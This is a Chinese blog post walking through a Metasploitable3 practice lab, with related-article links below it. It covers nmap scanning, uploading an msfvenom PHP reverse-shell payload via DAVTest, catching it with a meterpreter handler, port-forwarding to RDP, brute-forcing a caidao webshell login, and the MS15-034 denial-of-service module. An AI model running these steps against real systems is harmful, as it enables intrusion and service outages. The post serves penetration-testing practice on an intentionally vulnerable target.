metasploitable3:从入门到。。。。。。

最新推荐文章于 2024-04-06 16:11:24 发布
最新推荐文章于 2024-04-06 16:11:24 发布
阅读量4.5k 收藏 7
点赞数 1
分类专栏: metasploitable3 文章标签: metasploitable3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/106150468
版权

metasploit2中太容易拿漏洞,如:ms-080_67

在metasploitable3,Windows2008R2版本,在vmfusion虚拟软件中,网卡无法识别的解决办法:

要确保已经安装了VMware tools,没有可以到我提供的下载去下。https://download.csdn.net/download/lm19770429/12330501

然后,删除网卡,再添加,进入系统后,通过设备管理器更新一下驱动,不选默认网卡类型,而是选VMware INC的网卡类型,VMWARE PCI 。即可解决问题。

成功联网metasploitable3系统后,在靶机对其进行信息探测.登录密码:vagrant

nmap -p- -sS -sV -O -v -n  --open -oX filename.xml IP地址         #   -p- 对全部端口扫描

进入msf

新建一个工作区:win08R2

db_import filename.xml

services

注意观察端口、协议、版本信息

试试浏览各个http协议对应的端口8022、8484、8585

继续浏览web应用,如wordpress

利用DAVTest工具

DAVTest -url  http://IP:port/uploads

看到测试信息

还是利用msfvenom -p 载荷    LHOST=     LPORT=     -f  raw   > 攻击载荷名称.php

举例:

[点击并拖拽以移动]

接下来:利用DAVtest的上传功能,把生成的php文件传到目标靶机上

注意-uploadloc  一定要给靶机的目录,并指定一个新的文件名

进入msfconsole

启动反射监听,进行攻击

依旧是千年不变的:

use exploit/multi/handler

set payload php/meterpreter_reverse_tcp

set LHOST

set LPORT

exploit(run)

访问靶机刚才上传的漏洞后门文件,进行反射监听,进入后渗透环境meterpreter

meterpreter>sysinfo

ls

shell

远程登录一下靶机3389端口,再接连接靶机端口,行不通时,可以把远程端口绑定到本地端口

rdesktop 192.168.1.151:3389   这是登录不了的

利用meterpreter对的端口转发功能

portfwd -h

portfwd add -l 8888 -p 3389 -r 192.168.1.151

                   攻击机端口  远程端口  远程主机IP

 再用rdesktop进行远程主机登录

rdesktop 127.0.0.1:8888

what???又出错

如果不行,就再绑定一次,重来一遍,计算机就是这样

可以通过nmap扫描后的信息,可以看到22 端口

ssh漏洞利用:

ssh vagrant@192.168.1.151

scp vagrant@192.168.1.148:path/文件名     #远程下载 含flag文件

ssh -L 3389:localhost:3389 vagrant@192.168.1.151 --------------利用ssh 来做一个端口转发  强制开启3389端口   服务器本身就有防火墙,在nmap也扫不到

再用rdesktop 登录以下远程靶机

rdesktop 127.0.0.1:3389

在msfconsole中

search caidao

use auxiliary/scanner/http/caidao_bruteforce_login

show

set RHOSTS

set TARGETURI

set PASS_FILE    #可以使用默认的设置

run

如果运气好,会看到密码

 

在命令行:

java -jar cknife.jar

80端口--http

MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞远程蓝屏代码

微软IIS 6.0以上的的Windows Server 2008 R2/Server 2012/Server 2012

R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响

msfuse   auxiliary/dos/http/ms15_034_ulonglongadd  ----模块位置

set RHOSTS

run

 

 

花纵酒
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploitable3Metasploitable3是从头开始构建的VM,具有大量安全漏洞
02-09
Metasploitable3 Metasploitable3是从头开始构建的VM,具有大量安全漏洞。 它旨在用作测试漏洞的目标。 Metasploitable3是在BSD风格的许可证下发布的。 有关更多详细信息,请参见复制。 快速开始 要使用提供的预构建图像,创建一个新的本地metasploitable工作区: Linux用户: mkdir metasploitable3-workspace cd metasploitable3-workspace curl -O https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile && vagrant up Windows用户: mkdir metasploitable3-workspace cd metasploitable3-workspa
Metasploitable 3
05-24
https://www.loop0day.site/2019/05/24/国内环境搭建Metasploitable-3靶机/
Metasploitable3 + VMware 安装教程(记一次自己安装过程)
最新发布
weixin_45891814的博客
04-06 804
下载方式自由选择,可以选择下载zip也可以使用git链接下载到本地。我使用的是VMware workstation 16 pro。(1)packer下载完成之后解压到任一位置即可。windows系统选择amd64下载即可。VMware网络上有很多教程,自行百度即可。1.下载metasploitable3。2.安装metasploitable3。(2)配置packer系统环境。2.下载packer。3.下载VMware。1.配置packer。
Metasploitable3 + VMware 安装与使用 教程
热门推荐
cmcaimao的博客
04-17 1万+
在学习metasploit时我们往往需要一个靶场,以下介绍这个metasploitable 3里面集成了,系统漏洞、dwwa、论坛、sqlite等。它也做为一个学习渗透测试的测试环境。 Metasploitable3Metasploitable2的升级版本,它是一个虚拟靶机系统,里面含有大量未被修复的安全漏洞,它主要是用于metasploit-framework测试的漏洞目标。 不过Meta...
Windows10安装Metasploitable3
qq_23667585的博客
09-19 960
Win10 + VirtualBox + Vagrant快速搭建Metasploitable3脆弱系统
metasploitable3靶机
雨泽网络工作室
08-23 1694
Metasploitable3靶机攻击 注:这些密码都是参考网站https://github.com/rapid7/metasploitable3/wiki/Configuration#credentials 21端口ftp 使用nmap扫描发现21端口打开 通过msfconsole 调出metasploit 使用ftp_login模块 使用set设置参数 使用run进行攻击 登录 22端口ssh 通过nmap扫描发现22端口开启 爆破s..
【原创】记一次metasploitable3环境安装
05-07
一直想搭一套metasploitable3靶场环境,春节放假期间,尝试一下,由于中间有些工具不熟悉,安装过程中走了一些弯路,在此做个分享,同时也自己做个记录。
metasploitable3-master.zip
05-08
metasploitable3-master.zip
metasploitable3.7z
02-13
mkdir metasploitable3-workspace cd metasploitable3-workspace curl -O https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile && vagrant up ``` Windows users: ``` mkdir ...
Metasploitable3渗透测试实战
温柔小薛的博客
02-17 4050
这是一个著名的靶场Metasploitable3,关于靶机搭建网上文章非常多,这里我就不再写了,但是关于漏洞挖掘没有什么文章,而且这个靶场windows版本和linux版本还有差别,我这里写一些简单的吧,自己就挖到这个程度了,有不对的地方还请前辈高人指点一二 目录1综述2.渗透过程2.1渗透路径说明2.1.1全端口扫描/服务发现2.1.2目录扫描2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。2.1.4二、sql注入2.1.5三、phpmyadmin远程php代码执行2.1.6四、文件上传漏
Metasploitable3-flag
Makboli的博客
08-19 816
Metasploitable3-flag 写这个文章是因老师给了我一个Metasploitable3的靶机,就来搞搞玩玩,然后经过不断地乱撞,最终搞到了15个flag,以下是我寻找15个flag的过程,希望小白的文章能对大家有所帮助。 ace_of_hearts 1.ace_of_hearts 这里刚刚拿到靶场环境,就随便翻了翻电脑里的文件,发现了一张红桃A 然后感觉这应该就是一个flag,打开kali尝试连接该靶机172.21.11.227. 先nmap扫一下,发现了8022端口可以搞一搞 然后打开msf
Metasploitable 3 实战渗透测试
耿先生的博客
02-07 1438
Metasploitable 3 实战渗透测试 环境准备 靶机:Metasploitable 3 链接:https://pan.baidu.com/s/13kcqMwrUoxgE6_vxD8L0wA 提取码:66ws 所有文件同时解压就可以使用VMware workstation打开了 IP:192.168.22.139 攻击端:kali Linux IP:192.168.22.129 实验流程参考 PTES 渗透执行标准 1.前期交互阶段 前期交互阶段通常是由你与客户组织进行讨论,来确定渗透测试的范围
metasploitable3环境安装
weixin_41489908的博客
02-01 2337
你多少岁不重要,看起来像几岁才重要,不要把辛苦和怨气都挂在脸上,你想要最好的生活,就先让生活看到最好的你。。。。 ---- 网易云热评 一、下载 Metasploitable3 下载地址:https://github.com/rapid7/metasploitable3 二、下载Packer 下载地址:https://www.packer.io/downloads 三、下载vagrant 下载地址:https://releases.hashicorp.com/vag...
2021年最新metasploitable3虚拟机安装教程---三分钟搞定
THMAIL的博客
04-21 5078
网上很多教程又是packer又是vagrant的,瞎几把折腾几天也没搞定,一句命令,多处报错,而且安装起来服务器在国外以至于超级慢,超时就自己挂掉且前面安装的也没了,超级恶心,然后在官方github找到了最简洁的安装方法: 1.下载ova文件 https://github.com/brimstone/metasploitable3/releases 2.用vm ware或者 virtual Box打开下载好的ova文件或者选择导入虚拟机 3.开机,结束 ...
win10下快速搭建metasploitable3教程-简单版-已避坑
THMAIL的博客
04-22 2758
最近搭建metasploitable3时遇到了诸多问题,有一说一不管是网上的教程还是官方的教程都tm全是坑,我也是服的,经过三天的折腾才tm装好靶场,网上有很多傻卵只会转发复制粘贴,坑人不浅,太智障了,这里记录下搭建教程给后来者避坑: 搭建方法: 1.你可以选择自己从github下载源文件编译自己的box,然后再安装; 2.也可以直接用vagrant快速搭建(vagrant相当于docker,vagrantfile相当于dockerfile,建议抽五分钟找个文章看一下); 因为本教程为快速搭建.
渗透测试实例:Metasploitable3靶机
lxy123_com的博客
02-09 3855
实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20 实验目的:对Metasploitable3靶机进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss对靶机进行扫描
Metasploitable3-Six of Diamonds 第三个flag
avasy的博客
02-02 1654
在上次渗透中,我发现靶机对应的8585端口里面存在一个upload目录,这让我想到靶机可能存在文件上传漏洞,尝试上传一个菜刀马。 我用到了kali的工具cadaver 在上传php文件前,我首先上传一个txt文件验证一下 先在kali内新建一个txt文件 保存后上传 上传成功,打开浏览器验证 用gedit新建一个chopper.php文件,用cadver上传 上传成功 然后用菜刀连接 我...
Network penetration testing_Work3(使用Nmap进行scan和penetrate Metasploitable)
CLOVER的博客
11-12 3546
一:Nmap的介绍和使用 Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 现在我们使用Nmap来进行靶机的scan和penetrate。 1、首先我们要验证Kali和Metasploitable是否已经处在同一个局域网下,保证2者的连接性。 从上图可以看出Kali与靶机是联通的,现在可以进行下一步的操作。 2、Kali端使用Nmap扫描发现靶机。 输入本机的IP范围
vwware 安装metasploitable3
06-02
要在VMware中安装Metasploitable3,可以按照以下步骤进行操作: 1. 首先,从 https://github.com/rapid7/metasploitable3 下载Metasploitable3的最新版本。 2. 解压缩下载的文件并将其保存到您选择的位置。 3. 打开VMware并单击“文件”选项卡,然后选择“打开虚拟机”。 4. 在打开虚拟机向导中,选择解压缩的文件夹中的“Metasploitable3.vmx”文件。 5. 然后,按照向导中的指示完成虚拟机的设置。 6. 点击“完成”后,Metasploitable3虚拟机将在VMware中启动。 7. 最后,您可以使用Kali Linux或其他渗透测试工具来测试和评估Metasploitable3的安全性。 请注意,Metasploitable3是一个易受攻击的虚拟机,仅用于渗透测试和安全评估目的。在使用它之前,请确保您已经了解了渗透测试的基础知识,并遵守道德渗透测试的原则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值